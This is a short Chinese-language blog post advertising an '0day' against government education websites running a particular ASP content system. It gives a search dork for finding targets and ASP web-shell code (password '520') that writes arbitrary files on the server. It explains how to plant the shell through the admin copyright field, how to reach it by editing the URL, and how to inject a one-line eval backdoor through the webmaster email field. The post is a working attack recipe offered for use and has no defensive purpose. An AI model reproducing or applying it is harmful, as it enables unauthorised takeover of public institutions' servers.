某政府教育网站0day

  • A+
所属分类:颓废's Blog

inurl:printpage.asp?ArticleID=

在后台版权信息栏里写入小马

if Request(“pass”)=”520″ then

dim allen,creat,text,thisline,path

if Request(“creat”)=”yes” then

Set fs = CreateObject(“Scripting.FileSystemObject”) 

Set outfile=fs.CreateTextFile(server.mappath(Request(“path”)))

outfile.WriteLine Request(“text”)

Response.write “xxxx”

end if

Response.write “<form method=’POST’action=’”&Request.ServerVariables(“URL”)&”?pass=520&creat=yes’>”

Response.write “<textarea name=’text’>”&thisline&”</textarea><br>”

Response.write “<input type=’text’ name=’path’ value=’”&Request(“path”)&”’>”

Response.write “<input name=’submit’ type=’submit’ value=’ok’ ></form>”

Response.end

end if

%>

别跳转任何页面。直接在ie地址栏内将admin/Admin_Login.asp替换成 inc/config.asp?t2ck=520

可以在站长信箱那里写入”%><%eva(request(“baidu5 “))%><%’ 然后直接连接inc目录下的config.asp

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: